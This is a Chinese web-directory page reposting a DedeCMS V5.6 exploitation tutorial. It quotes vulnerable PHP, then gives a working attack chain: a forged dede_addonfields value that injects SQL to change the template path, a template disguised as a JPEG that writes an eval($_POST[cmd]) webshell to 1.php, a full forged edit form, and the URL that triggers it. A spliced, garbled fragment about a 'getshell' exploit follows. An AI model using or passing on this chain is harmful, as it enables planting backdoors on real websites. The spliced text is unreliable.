Welcome to the website navigation,本站只接受合法正规的企业网站,欢迎站长们提交你的网站获得展示和流量有任何问题请联系站长,欢迎大家加入本站。

                
提交网站
  • 网站:76083
  • 待审:5
  • APP:577
  • 文章:304411
  • 会员:56004
文字内链包年1000元 文字内链包年1000元 文字内链包年1000元 AI办公网站 AI绘画工具 AIchat

名站网址导航为大驾家提供DedeCMS站点程序站点教程相关的知识,比如织梦程序安装教程,织梦程序系统故障等教程。

织梦程序DEDECMS站点管理系统模板执行漏洞
一个不小心,你的服务器就会被黑客攻破,比如数据库密码过于简单,服务器密码过于简单,或者CMS系统漏洞。
  下面是一个DEDE的模板执行漏洞。 漏洞描述:Dedecms V5.6 Final版本中的各个网站文件存在一系列问题,经过精心构造的含有恶意代表的模板网站内容可以通过用户网站的后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为咱们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意相关具体代码如下。   1、member/article_edit.php网站文件(注入): 漏洞在member网站文件夹下普遍存在,$dede_addonfields是由用户提交的,可以被伪造,伪造成功即可带入sql语句,于是咱们可以给附加表的网站内容进行update赋值。  //分析处理附加表数据 $inadd_f = ''; if(!emptyempty($dede_addonfields))//自己构造$dede_addonfields { $addonfields = explode(';',$dede_addonfields); if(is_array($addonfields)) { print_r($addonfields); foreach($addonfields as $v) { if($v=='') { continue; } $vs = explode(',',$v); if(!isset(${$vs[0]})) { ${$vs[0]} = ''; } ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid); $inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' "; echo $inadd_f; } } } if($addtable!='') { $upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";//执行构造的sql if(!$dsql->ExecuteNoneQuery($upQuery)) { ShowMsg("更新附加表 `$addtable` 时出错,请联系管理员!","javascript:;"); exit(); } }   2、include/inc_archives_view.php:   这是模板处理类,如果附加表的模板路径存在,直接从附加表取值;GetTempletFile获取模板网站文件的相关具体操作方法就是取的此处的模板路径,从来带进去解析。    //issystem==-1 表示单表模型,单表模型不支持redirecturl这类参数,因此限定网站内容普通模型才进行下面查询 if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1) { if(is_array($this->addTableRow)) { $this->Fields['redirecturl'] = $this->addTableRow['redirecturl']; $this->Fields['templet'] = $this->addTableRow['templet'];//取值 $this->Fields['userip'] = $this->addTableRow['userip']; } $this->Fields['templet'] = (emptyempty($this->Fields['templet']) ? '' : trim($this->Fields['templet'])); $this->Fields['redirecturl'] = (emptyempty($this->Fields['redirecturl']) ? '' : trim($this->Fields['redirecturl'])); $this->Fields['userip'] = (emptyempty($this->Fields['userip']) ? '' : trim($this->Fields['userip'])); } else { $this->Fields['templet'] = $this->Fields['redirecturl'] = ''; } //获得模板网站文件位置 function GetTempletFile() { global $cfg_basedir,$cfg_templets_dir,$cfg_df_style; $cid = $this->ChannelUnit->ChannelInfos['nid']; if(!emptyempty($this->Fields['templet'])) { $filetag = MfTemplet($this->Fields['templet']); if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag; } else { $filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]); } $tid = $this->Fields['typeid']; $filetag = str_replace('{cid}', $cid,$filetag); $filetag = str_replace('{tid}', $tid,$filetag); $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag; if($cid=='spec') { if( !emptyempty($this->Fields['templet']) ) { $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag; } else { $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm"; } } if(!file_exists($tmpfile)) { $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/".($cid=='spec' ? 'article_spec.htm' : 'article_default.htm'); } return $tmpfile; }   漏洞利用:   1.上传一个模板网站文件:   注册一个用户,进入用户管理网站的后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为咱们精心构造的模板,比如图片名称是:    uploads/userup/2/12OMX04-15A.jpg   模板网站内容是(如果限制图片格式,加gif89a):  {dede:name runphp='yes'} $fp = @fopen("1.php", 'a'); @fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n"); @fclose($fp); {/dede:name}   2.修改刚刚发表的文章,查看源网站文件,构造一个表单:    <form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();"> <input type="hidden" name="dopost" value="save" /> <input type="hidden" name="aid" value="2" /> <input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" /> <input type="hidden" name="channelid" value="1" /> <input type="hidden" name="oldlitpic" value="" /> <input type="hidden" name="sortrank" value="1275972263" /> <div id="mainCp"> <h3 class="meTitle"><strong>修改文章</strong></h3> <div class="postForm"> <label>文章标题:</label> <input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/> <label>标签TAG:</label> <input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开) <label>作者:</label> <input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/> <label>隶属栏目:</label> <select name='typeid' size='1'> <option value='1' class='option3' selected=''>测试栏目</option> </select> <span style="color:#F00">*</span>(不能选择带颜色的分类) <label>我的分类:</label> <select name='mtypesid' size='1'> <option value='0' selected>请选择分类...</option> <option value='1' class='option3' selected>hahahha</option> </select> <label>信息摘要:</label> <textarea name="description" id="description">1111111</textarea> (网站内容的简要说明) <label>缩略图:</label> <input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);" maxlength="100" class="intxt"/> <input type='text' name='templet' value="../ uploads/userup/2/12OMX04-15A.jpg"> <input type='text' name='dede_addonfields' value="templet,htmltext;">(这里构造) </div> <!-- 表单操作区域 --> <h3 class="meTitle">详细网站内容</h3> <div class="contentShow postForm"> <input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"> <img border="0" alt="" src="/anquan/UploadFiles_3093/201008/20100819191753331.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p> " style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /> <iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe> <label>验证码:</label> <input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' /> <img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src '?'" /> <button class="button2" type="submit">提交</button> <button class="button2 ml10" type="reset" onclick="location.reload();">重置</button> </div> </div> </form>   提交,提示修改成功,则咱们已经成功修改模板路径。
  3.访问修改的文章: 假设刚刚修改的文章的aid为2,则咱们只需要访问:  http://127.0.0.1/dede/plus/view.php?aid=2  即可以在plus目录下生成小马:1.php

dedecms网站程序最新版本修改任意管理员漏洞 getshell expl0XAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

l0XAIChat_企业网址导航_网址分类目录_企业黄页网址提交查询专业网站!

关于DedeCMS站点程序站点教程相关的知识,就说到这里了希望能帮助朋友们。

标签:

分享到:

  网友投稿

注册时间:

网站:0 个   APP:0 个  文章:0 篇

  • 76083

    网站

  • 577

    APP

  • 304411

    文章

  • 56004

    会员

赶快注册账号,推广您的网站吧!
文章分类
热门网站
最新入驻APP小程序

宝贝市场2023-02-08

宝贝市场——买手和卖家商品展示

夺宝助手2023-02-08

夺宝助手小程序,查看每日快夺宝平

查诚信2023-02-08

查诚信是一款免费的商业查询工具

车价天天报2023-02-08

快速连接汽车销售,获知汽车最新报

考勤助理小程序2023-02-08

上班签到考勤,实时定位,后台轻松

汽车报价大全查询2023-02-08

汽车报价大全查询提供最新汽车市